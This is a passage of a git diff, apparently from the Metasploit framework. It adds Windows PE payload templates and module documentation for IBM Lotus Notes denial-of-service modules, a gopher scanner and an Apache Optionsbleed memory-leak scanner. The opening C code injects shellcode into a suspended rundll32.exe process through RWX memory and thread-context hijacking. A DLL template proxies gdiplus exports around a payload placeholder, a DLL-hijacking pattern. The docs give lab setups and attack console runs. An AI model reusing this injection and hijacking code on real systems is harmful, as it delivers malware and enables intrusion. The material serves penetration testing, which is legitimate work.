||||||
|
// Create a suspended process, write shellcode into stack, make stack RWX, resume it
|
||||||
|
if(CreateProcess( 0, "rundll32.exe", 0, 0, 0, CREATE_SUSPENDED|IDLE_PRIORITY_CLASS, 0, 0, &si, &pi)) {
|
||||||
|
ctx.ContextFlags = CONTEXT_INTEGER|CONTEXT_CONTROL;
|
||||||
|
GetThreadContext(pi.hThread, &ctx);
|
||||||
|
|
||||||
|
ep = (LPVOID) VirtualAllocEx(pi.hProcess, NULL, SCSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
|
||||||
|
|
||||||
|
WriteProcessMemory(pi.hProcess,(PVOID)ep, &code, SCSIZE, 0);
|
||||||
|
|
||||||
|
#ifdef _WIN64
|
||||||
|
ctx.Rip = (DWORD64)ep;
|
||||||
|
#else
|
||||||
|
ctx.Eip = (DWORD)ep;
|
||||||
|
#endif
|
||||||
|
|
||||||
|
SetThreadContext(pi.hThread,&ctx);
|
||||||
|
|
||||||
|
ResumeThread(pi.hThread);
|
||||||
|
CloseHandle(pi.hThread);
|
||||||
|
CloseHandle(pi.hProcess);
|
||||||
|
}
|
||||||
|
// ExitProcess(0);
|
||||||
|
ExitThread(0);
|
||||||
|
}
|
||||||
|
|
||||||
|
/*
|
||||||
|
typedef VOID
|
||||||
|
(NTAPI *PIMAGE_TLS_CALLBACK) (
|
||||||
|
PVOID DllHandle,
|
||||||
|
ULONG Reason,
|
||||||
|
PVOID Reserved
|
||||||
|
);
|
||||||
|
|
||||||
|
VOID NTAPI TlsCallback(
|
||||||
|
IN PVOID DllHandle,
|
||||||
|
IN ULONG Reason,
|
||||||
|
IN PVOID Reserved)
|
||||||
|
{
|
||||||
|
__asm ( "int3" );
|
||||||
|
}
|
||||||
|
|
||||||
|
ULONG _tls_index;
|
||||||
|
PIMAGE_TLS_CALLBACK _tls_cb[] = { TlsCallback, NULL };
|
||||||
|
IMAGE_TLS_DIRECTORY _tls_used = { 0, 0, (ULONG)&_tls_index, (ULONG)_tls_cb, 1000, 0 };
|
||||||
|
*/
|
||||||
|
|
0
data/exploits/cve-2017-8464/src/template.def → data/templates/src/pe/dll_gdiplus/template.def
Normal file → Executable file
0
data/exploits/cve-2017-8464/src/template.def → data/templates/src/pe/dll_gdiplus/template.def
Normal file → Executable file
|
@ -0,0 +1,40 @@
|
||||||
|
#define SCSIZE 2048
|
||||||
|
unsigned char code[SCSIZE] = "PAYLOAD:";
|
||||||
|
|
||||||
|
#ifdef _MSC_VER
|
||||||
|
#pragma comment (linker, "/export:GdipAlloc=c:/windows/system32/gdiplus.GdipAlloc,@34")
|
||||||
|
#pragma comment (linker, "/export:GdipCloneBrush=c:/windows/system32/gdiplus.GdipCloneBrush,@46")
|
||||||
|
#pragma comment (linker, "/export:GdipCloneImage=c:/windows/system32/gdiplus.GdipCloneImage,@50")
|
||||||
|
#pragma comment (linker, "/export:GdipCreateBitmapFromStream=c:/windows/system32/gdiplus.GdipCreateBitmapFromStream,@74")
|
||||||
|
#pragma comment (linker, "/export:GdipCreateFromHDC=c:/windows/system32/gdiplus.GdipCreateFromHDC,@84")
|
||||||
|
#pragma comment (linker, "/export:GdipCreateHBITMAPFromBitmap=c:/windows/system32/gdiplus.GdipCreateHBITMAPFromBitmap,@87")
|
||||||
|
#pragma comment (linker, "/export:GdipCreateLineBrushI=c:/windows/system32/gdiplus.GdipCreateLineBrushI,@97")
|
||||||
|
#pragma comment (linker, "/export:GdipCreateSolidFill=c:/windows/system32/gdiplus.GdipCreateSolidFill,@122")
|
||||||
|
#pragma comment (linker, "/export:GdipDeleteBrush=c:/windows/system32/gdiplus.GdipDeleteBrush,@130")
|
||||||
|
#pragma comment (linker, "/export:GdipDeleteGraphics=c:/windows/system32/gdiplus.GdipDeleteGraphics,@135")
|
||||||
|
#pragma comment (linker, "/export:GdipDisposeImage=c:/windows/system32/gdiplus.GdipDisposeImage,@143")
|
||||||
|
#pragma comment (linker, "/export:GdipFillRectangleI=c:/windows/system32/gdiplus.GdipFillRectangleI,@219")
|
||||||
|
#pragma comment (linker, "/export:GdipFree=c:/windows/system32/gdiplus.GdipFree,@225")
|
||||||
|
#pragma comment (linker, "/export:GdiplusShutdown=c:/windows/system32/gdiplus.GdiplusShutdown,@608")
|
||||||
|
#pragma comment (linker, "/export:GdiplusStartup=c:/windows/system32/gdiplus.GdiplusStartup,@609")
|
||||||
|
#endif
|
||||||
|
#ifdef __GNUC__
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipAlloc=c:/windows/system32/gdiplus.GdipAlloc @34\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipCloneBrush=c:/windows/system32/gdiplus.GdipCloneBrush @46\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipCloneImage=c:/windows/system32/gdiplus.GdipCloneImage @50\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipCreateBitmapFromStream=c:/windows/system32/gdiplus.GdipCreateBitmapFromStream @74\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipCreateFromHDC=c:/windows/system32/gdiplus.GdipCreateFromHDC @84\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipCreateHBITMAPFromBitmap=c:/windows/system32/gdiplus.GdipCreateHBITMAPFromBitmap @87\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipCreateLineBrushI=c:/windows/system32/gdiplus.GdipCreateLineBrushI @97\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipCreateSolidFill=c:/windows/system32/gdiplus.GdipCreateSolidFill @122\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipDeleteBrush=c:/windows/system32/gdiplus.GdipDeleteBrush @130\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipDeleteGraphics=c:/windows/system32/gdiplus.GdipDeleteGraphics @135\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipDisposeImage=c:/windows/system32/gdiplus.GdipDisposeImage @143\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipFillRectangleI=c:/windows/system32/gdiplus.GdipFillRectangleI @219\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdipFree=c:/windows/system32/gdiplus.GdipFree @225\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdiplusShutdown=c:/windows/system32/gdiplus.GdiplusShutdown @608\"");
|
||||||
|
asm (".section .drectve\n\t.ascii \" -export:GdiplusStartup=c:/windows/system32/gdiplus.GdiplusStartup @609\"");
|
||||||
|
#endif
|
||||||
|
|
||||||
|
|
||||||
|
|
0
data/exploits/cve-2017-8464/src/template.rc → data/templates/src/pe/dll_gdiplus/template.rc
Normal file → Executable file
0
data/exploits/cve-2017-8464/src/template.rc → data/templates/src/pe/dll_gdiplus/template.rc
Normal file → Executable file
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,63 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.
|
||||||
|
|
||||||
|
JavaScript is used to create an object instance of encode URI within an infinite loop,
|
||||||
|
leading to a Denial of Service of the IBM Lotus Notes app itself.
|
||||||
|
|
||||||
|
Vulnerable app versions include:
|
||||||
|
* IBM Notes 9.0.1 to 9.0.1 FP8IF1
|
||||||
|
* IBM Notes 9.0 to 9.0 IF4.
|
||||||
|
* IBM Notes 8.5.3 to 8.5.3 FP6 IF13.
|
||||||
|
* IBM Notes 8.5.2 to 8.5.2 FP4 IF3.
|
||||||
|
* IBM Notes 8.5.1. to 8.5.1 FP5 IF5.
|
||||||
|
* IBM Notes 8.5 release
|
||||||
|
|
||||||
|
Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999385
|
||||||
|
|
||||||
|
## Verification
|
||||||
|
|
||||||
|
1. Start msfconsole
|
||||||
|
1. `use auxiliary/dos/http/ibm_lotus_notes.rb`
|
||||||
|
1. Set `SRVHOST`
|
||||||
|
1. Set `SRVPORT`
|
||||||
|
1. run (Server started)
|
||||||
|
1. Visit server URL in the built-in web-browser of IBM Notes client application
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/dos/http/ibm_lotus_notes
|
||||||
|
msf auxiliary(ibm_lotus_notes) > show options
|
||||||
|
|
||||||
|
Module options (auxiliary/dos/http/ibm_lotus_notes):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
|
||||||
|
SRVPORT 8080 yes The local port to listen on.
|
||||||
|
SSL false no Negotiate SSL for incoming connections
|
||||||
|
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||||
|
URIPATH no The URI to use for this exploit (default is random)
|
||||||
|
|
||||||
|
|
||||||
|
Auxiliary action:
|
||||||
|
|
||||||
|
Name Description
|
||||||
|
---- -----------
|
||||||
|
WebServer
|
||||||
|
|
||||||
|
|
||||||
|
msf auxiliary(ibm_lotus_notes) > set SRVHOST 192.168.0.50
|
||||||
|
SRVHOST => 192.168.0.50
|
||||||
|
msf auxiliary(ibm_lotus_notes) > set SRVPORT 9092
|
||||||
|
SRVPORT => 9092
|
||||||
|
msf auxiliary(ibm_lotus_notes) > run
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(ibm_lotus_notes) >
|
||||||
|
[*] Using URL: http://192.168.0.50:9092/ImlbHZVXlvTEXYd
|
||||||
|
[*] Server started.
|
||||||
|
msf auxiliary(ibm_lotus_notes) >
|
||||||
|
```
|
||||||
|
|
||||||
|
At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive.
|
|
@ -0,0 +1,67 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
This module exploits a vulnerability in the built-in web-browser of IBM Lotus Notes client application.
|
||||||
|
|
||||||
|
If a user is persuaded to click on a malicious link, it would open up many file select dialog boxes which,
|
||||||
|
would cause the client hang and have to be restarted.
|
||||||
|
|
||||||
|
Affected Products and Versions
|
||||||
|
|
||||||
|
IBM Notes 9.0.1 to 9.0.1 FP8 IF1
|
||||||
|
IBM Notes 9.0 to 9.0 IF4.
|
||||||
|
IBM Notes 8.5.3 to 8.5.3 FP6 IF13.
|
||||||
|
IBM Notes 8.5.2 to 8.5.2 FP4 IF3.
|
||||||
|
IBM Notes 8.5.1. to 8.5.1 FP5 IF5.
|
||||||
|
IBM Notes 8.5 release
|
||||||
|
|
||||||
|
Related security bulletin from IBM: http://www-01.ibm.com/support/docview.wss?uid=swg21999384
|
||||||
|
|
||||||
|
## Verification
|
||||||
|
|
||||||
|
Start msfconsole
|
||||||
|
|
||||||
|
`use auxiliary/dos/http/ibm_lotus_notes2.rb`
|
||||||
|
|
||||||
|
Set `SRVHOST`
|
||||||
|
|
||||||
|
Set `SRVPORT`
|
||||||
|
|
||||||
|
run (Server started)
|
||||||
|
Visit server URL in the built-in web-browser of IBM Notes client application
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/dos/http/ibm_lotus_notes2
|
||||||
|
msf auxiliary(ibm_lotus_notes2) > show options
|
||||||
|
|
||||||
|
Module options (auxiliary/dos/http/ibm_lotus_notes2):
|
||||||
|
|
||||||
|
Name Current Setting Required Description
|
||||||
|
---- --------------- -------- -----------
|
||||||
|
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
|
||||||
|
SRVPORT 8080 yes The local port to listen on.
|
||||||
|
SSL false no Negotiate SSL for incoming connections
|
||||||
|
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||||
|
URIPATH no The URI to use for this exploit (default is random)
|
||||||
|
|
||||||
|
|
||||||
|
Auxiliary action:
|
||||||
|
|
||||||
|
Name Description
|
||||||
|
---- -----------
|
||||||
|
WebServer
|
||||||
|
|
||||||
|
|
||||||
|
msf auxiliary(ibm_lotus_notes2) > set SRVHOST 192.168.0.50
|
||||||
|
SRVHOST => 192.168.0.50
|
||||||
|
msf auxiliary(ibm_lotus_notes2) > set SRVPORT 9092
|
||||||
|
SRVPORT => 9092
|
||||||
|
msf auxiliary(ibm_lotus_notes2) > run
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf auxiliary(ibm_lotus_notes2) >
|
||||||
|
[*] Using URL: http://192.168.0.50:9092/mypath
|
||||||
|
[*] Server started.
|
||||||
|
msf auxiliary(ibm_lotus_notes2) >
|
||||||
|
```
|
||||||
|
|
||||||
|
At this point, the target should use the built-in web browser of their IBM Lotus Notes client to navigate to the above "Using URL" value. And then they should see their Notes app become unresponsive.
|
|
@ -0,0 +1,148 @@
|
||||||
|
## Vulnerable Application
|
||||||
|
|
||||||
|
Any gopher server will work. There seems to only be [a few left](https://en.wikipedia.org/wiki/Gopher_(protocol)#Server_software)
|
||||||
|
in 2017.
|
||||||
|
|
||||||
|
A few options for local installation and testing are below.
|
||||||
|
|
||||||
|
### Docker Install
|
||||||
|
|
||||||
|
A [dockerized gopher server written in Go](https://hub.docker.com/r/prodhe/gopher/) is available. To install and run this, with content being
|
||||||
|
served out of a temporary directory in which you'll be left:
|
||||||
|
|
||||||
|
```
|
||||||
|
$ docker pull prodhe/gopher
|
||||||
|
Using default tag: latest
|
||||||
|
latest: Pulling from prodhe/gopher
|
||||||
|
627beaf3eaaf: Already exists
|
||||||
|
8800e3417eb1: Pull complete
|
||||||
|
d9f3bcdad0eb: Pull complete
|
||||||
|
c018073abd26: Pull complete
|
||||||
|
b2855f535c50: Pull complete
|
||||||
|
23480a2f73d8: Pull complete
|
||||||
|
1555a5435ec5: Pull complete
|
||||||
|
0728d289e0fc: Pull complete
|
||||||
|
6f6f265b58ee: Pull complete
|
||||||
|
Digest: sha256:69931d56946d192d9bd155a88b6f365cb276e9edf453129d374e64d244d1edaa
|
||||||
|
Status: Downloaded newer image for prodhe/gopher:latest
|
||||||
|
$ cd `mktemp -d`;
|
||||||
|
$ sudo docker run --rm -d -it --name gopher_test -v `pwd -P`:/public -p 70:70 prodhe/gopher
|
||||||
|
2017/10/20 16:45:01 Serving /public/ at localhost:70
|
||||||
|
$ date > test.txt
|
||||||
|
$ echo HELLO > README.md
|
||||||
|
```
|
||||||
|
|
||||||
|
*NOTE*: Don't forget to `docker stop` the container ID returned from the `docker run` command just run above:
|
||||||
|
```
|
||||||
|
$ docker stop X
|
||||||
|
X
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
### Ubuntu 16.04 Install
|
||||||
|
|
||||||
|
First we need to install the server:
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo apt-get install gopher-server
|
||||||
|
```
|
||||||
|
Next, we need to build content for the scanner to find. Gopher works off of a `gophermap`, somewhat similar
|
||||||
|
to a content index page, where files are listed in a menu type system.
|
||||||
|
|
||||||
|
```
|
||||||
|
echo "<html><h1>hello world</h1></html>" | sudo tee /var/gopher/example.html
|
||||||
|
echo "foobarbaz" | sudo tee /var/gopher/foobar.txt
|
||||||
|
sudo mkdir /var/gopher/msf
|
||||||
|
echo "meterpreter rules" | sudo tee /var/gopher/msf/meterp.txt
|
||||||
|
sudo wget "https://pbs.twimg.com/profile_images/580131056629735424/2ENTk2K2.png" -O /var/gopher/msf/logo.png
|
||||||
|
|
||||||
|
echo -ne "gopher custom gophermap\n\nhHello World\t/example.html\t1.1.1.1\t70\n0Foo File\t/foobar.txt\t1.1.1.1\t70\n1msf\t/msf\t1.1.1.1\t70\nhmetasploit homepage\tURL:http://metasploit.com/\n" | sudo tee /var/gopher/gophermap
|
||||||
|
sudo chmod +r -R /var/gopher
|
||||||
|
```
|
||||||
|
|
||||||
|
In this case we create an html file, text file, a directory with a text file and png file in it. Enough content so its nice to look at.
|
||||||
|
Next we write our `gophermap` file. The first line is just an intro. After that, we list our files that the client can access.
|
||||||
|
|
||||||
|
The format of these lines is: `XSome text here[TAB]/path/to/content[TAB]example.org[TAB]port`. The first character, `X` is the file type
|
||||||
|
which can be referenced in the table below. The final address (example.org) and PORT are optional.
|
||||||
|
|
||||||
|
The following table contains the file types associated with the characters:
|
||||||
|
|
||||||
|
| Itemtype | Content |
|
||||||
|
|----------|---------------------------------|
|
||||||
|
| 0 | Text file |
|
||||||
|
| 1 | Directory |
|
||||||
|
| 2 | CSO name server |
|
||||||
|
| 3 | Error |
|
||||||
|
| 4 | Mac HQX filer |
|
||||||
|
| 5 | PC binary |
|
||||||
|
| 6 | UNIX uuencoded file |
|
||||||
|
| 7 | Search server |
|
||||||
|
| 8 | Telnet Session |
|
||||||
|
| 9 | Binary File |
|
||||||
|
| c | Calendar (not in 2.06) |
|
||||||
|
| e | Event (not in 2.06) |
|
||||||
|
| g | GIF image |
|
||||||
|
| h | HTML, Hypertext Markup Language |
|
||||||
|
| i | inline text type |
|
||||||
|
| s | Sound |
|
||||||
|
| I | Image (other than GIF) |
|
||||||
|
| M | MIME multipart/mixed message |
|
||||||
|
| T | TN3270 Session |
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Install the application
|
||||||
|
2. Start msfconsole
|
||||||
|
3. Do: ```use auxiliary/scanner/gopher/gopher_gophermap```
|
||||||
|
4. Do: ```set rhosts [IPs]```
|
||||||
|
5. Do: ```run```
|
||||||
|
6. You should see the gophermap file printed in a parsed format
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**PATH**
|
||||||
|
|
||||||
|
It is possible to view content within a directory of the gophermap. If the intial run shows directory `Directory: foobar`,
|
||||||
|
setting **path** to `/foobar` will enumerate the contents of that folder. Default: [empty string].
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Docker Gopher Server
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/gopher/gopher_gophermap
|
||||||
|
msf auxiliary(gopher_gophermap) > set RHOSTS localhost
|
||||||
|
RHOSTS => localhost
|
||||||
|
msf auxiliary(gopher_gophermap) > run
|
||||||
|
|
||||||
|
[+] 127.0.0.1:70 - Text file: README.md
|
||||||
|
[+] 127.0.0.1:70 - Path: localhost:70/README.md
|
||||||
|
[+] 127.0.0.1:70 - Text file: test.txt
|
||||||
|
[+] 127.0.0.1:70 - Path: localhost:70/test.txt
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
```
|
||||||
|
### Gopher-server on Ubuntu 16.04
|
||||||
|
|
||||||
|
```
|
||||||
|
msf > use auxiliary/scanner/gopher/gopher_gophermap
|
||||||
|
msf auxiliary(gopher_gophermap) > set rhosts 1.1.1.1
|
||||||
|
rhosts => 1.1.1.1
|
||||||
|
msf auxiliary(gopher_gophermap) > set verbose true
|
||||||
|
verbose => true
|
||||||
|
msf auxiliary(gopher_gophermap) > run
|
||||||
|
|
||||||
|
[+] 1.1.1.1:70 - gopher custom gophermap
|
||||||
|
[+] 1.1.1.1:70 -
|
||||||
|
[+] 1.1.1.1:70 - HTML: Hello World
|
||||||
|
[+] 1.1.1.1:70 - Path: 1.1.1.1:70/example.html
|
||||||
|
[+] 1.1.1.1:70 - Text file: Foo File
|
||||||
|
[+] 1.1.1.1:70 - Path: 1.1.1.1:70/foobar.txt
|
||||||
|
[+] 1.1.1.1:70 - Directory: msf
|
||||||
|
[+] 1.1.1.1:70 - Path: 1.1.1.1:70/msf
|
||||||
|
[+] 1.1.1.1:70 - HTML: metasploit homepage
|
||||||
|
[+] 1.1.1.1:70 - Path: 1.1.1.1:70/URL:http://metasploit.com/
|
||||||
|
[*] Scanned 1 of 1 hosts (100% complete)
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
|
||||||
|
```
|
|
@ -0,0 +1,148 @@
|
||||||
|
## Description
|
||||||
|
|
||||||
|
This module scans for the Apache optionsbleed vulnerability where the Allow response header
|
||||||
|
returned from an OPTIONS request may bleed memory if the server has a .htaccess file
|
||||||
|
with an invalid Limit method defined.
|
||||||
|
|
||||||
|
### Vulnerable Application Setup
|
||||||
|
|
||||||
|
This setup is slightly more complex than a default instance, but potentially gives more interesting results. It is more or less based on a
|
||||||
|
blog post by [securitysift.com](https://www.securitysift.com/testing-optionsbleed/).
|
||||||
|
|
||||||
|
This setup was performed on an Ubuntu 16.04 server with apache 2.4.18-2ubuntu3.1.
|
||||||
|
Apache was patched in [2.4.18-2ubuntu3.5](https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-9798.html)
|
||||||
|
|
||||||
|
1. First thing we'll do is create 2 virtual host directories with content
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo mkdir -p /var/www/html/s1
|
||||||
|
sudo mkdir -p /var/www/html/s2
|
||||||
|
|
||||||
|
echo "<Limit method0 method1 method2 method3 method4 method5>
|
||||||
|
Allow from all
|
||||||
|
</Limit>" | sudo tee /var/www/html/s1/.htaccess
|
||||||
|
|
||||||
|
echo "
|
||||||
|
<html>
|
||||||
|
<h1>Attacker</h1>
|
||||||
|
</html>
|
||||||
|
" | sudo tee /var/www/html/s1/index.html
|
||||||
|
|
||||||
|
echo "
|
||||||
|
<?php
|
||||||
|
\$user = \$_POST[\"username\"];
|
||||||
|
\$pwd = \$_POST[\"password\"];
|
||||||
|
\$otherdata = \$_POST[\"otherdata\"];
|
||||||
|
?>
|
||||||
|
<form action=\"index.php\" method=\"POST\">
|
||||||
|
Otherdata: <input type=\"text\" name=\"otherdata\"><br>
|
||||||
|
Username: <input type=\"text\" name=\"username\"><br>
|
||||||
|
Password: <input type=\"text\" name=\"password\"><br>
|
||||||
|
<input type=\"submit\" value=\"Submit\">
|
||||||
|
</form>
|
||||||
|
" | sudo tee /var/www/html/s2/index.php
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Now we'll modify apache to have 2 virtual hosts, an attacker on port 80 and victim on port 81
|
||||||
|
|
||||||
|
```
|
||||||
|
sudo echo "Listen 80
|
||||||
|
Listen 81
|
||||||
|
|
||||||
|
<VirtualHost *:81>
|
||||||
|
#victim
|
||||||
|
DocumentRoot /var/www/html/s2
|
||||||
|
ErrorLog \${APACHE_LOG_DIR}/error_victim.log
|
||||||
|
CustomLog \${APACHE_LOG_DIR}/access_victim.log combined
|
||||||
|
</VirtualHost>
|
||||||
|
<VirtualHost *:80>
|
||||||
|
#attacker
|
||||||
|
DocumentRoot /var/www/html/s1
|
||||||
|
ErrorLog \${APACHE_LOG_DIR}/error_attacker.log
|
||||||
|
CustomLog \${APACHE_LOG_DIR}/access_attacker.log combined
|
||||||
|
<Directory /var/www/html/s1>
|
||||||
|
AllowOverride All
|
||||||
|
</Directory>
|
||||||
|
</VirtualHost>
|
||||||
|
" | sudo tee /etc/apache2/sites-enabled/000-default.conf
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Restart the service
|
||||||
|
|
||||||
|
```sudo service apache2 restart```
|
||||||
|
|
||||||
|
4. We'll want to generate some traffic to the victim, so we'll use an infinite loop to send fake login requests
|
||||||
|
|
||||||
|
```
|
||||||
|
while true; do curl -d "otherdata=otherdata&username=admin&password=passw0rd" -X POST -s http://[IP]:81/index.php > /dev/null; done
|
||||||
|
```
|
||||||
|
|
||||||
|
Now you have 2 virtual hosts, a vulnerable `.htaccess` file on port 80 in root, and memory being churned to simulate a live host.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
1. Do: ```use auxiliary/scanner/http/apache_optionsbleed```
|
||||||
|
2. Do: ```set RHOSTS [IP]```
|
||||||
|
3. Do: ```set RPORT [PORT]```
|
||||||
|
4. Do: ```run```
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
### Using the setup mentioned previously
|
||||||
|
|
||||||
|
```
|
||||||
|
[*] Processing optionsbleed.rc for ERB directives.
|
||||||
|
resource (optionsbleed.rc)> use auxiliary/scanner/http/apache_optionsbleed
|
||||||
|
resource (optionsbleed.rc)> set rhosts 192.168.2.104
|
||||||
|
rhosts => 192.168.2.104
|
||||||
|
resource (optionsbleed.rc)> set threads 10
|
||||||
|
threads => 10
|
||||||
|
resource (optionsbleed.rc)> run
|
||||||
|
[+] Request 1: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,<2C><>)<01>~,HEAD,,HEAD,POST
|
||||||
|
[+] Request 2: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,,HEAD,<2C><><01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,POST
|
||||||
|
[+] Request 3: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,8<>)<01>~,HEAD,POST
|
||||||
|
[+] Request 4: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C>4<01>~,<2C><><01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,,HEAD,,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 5: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C><><01>~,,HEAD,,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 6: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,POST
|
||||||
|
[+] Request 7: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,,HEAD,<2C><><01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 8: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,,HEAD,<2C>4<01>~,<2C><><01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 9: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C><><01>~,,HEAD,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 10: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C><><01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 11: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C>4<01>~,<2C><><01>~,,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,POST
|
||||||
|
[+] Request 13: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C>T<01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 14: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C><01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,,HEAD,allow,HEAD,,HEAD,,HEAD,POST
|
||||||
|
[+] Request 15: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><><01>~,8<>)<01>~,HEAD,POST
|
||||||
|
[+] Request 16: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C>T<01>~,<2C>4<01>~,<2C><><01>~,8<>)<01>~,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>)<01>~,HEAD,POST
|
||||||
|
[+] Request 18: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,,HEAD,<2C>T<01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,<2C><>)<01>~,HEAD,,HEAD,POST
|
||||||
|
[+] Request 19: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,,HEAD,<2C>T<01>~,<2C>4<01>~,8<>)<01>~,HEAD,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,,HEAD,POST
|
||||||
|
[+] Request 20: [OptionsBleed Response] -> GET,HEAD,OPTIONS,<2C><01>~,<2C>T<01>~,,HEAD,8<>)<01>~,HEAD,8<>)<01>~,HEAD,,HEAD,<2C><>,<01>~,HEAD,<2C><>,<01>~,HEAD,,HEAD,<2C><>)<01>~,HEAD,,HEAD,POST
|
||||||
|
[+] Request 21: [OptionsBleed Response] -> GET,HEAD,OPTIONS,,HEAD,<2C>4<01>~,,HEAD,8<>)<01>~,HEAD,<2C><>,<01>~,HEAD,POST
|
||||||
|
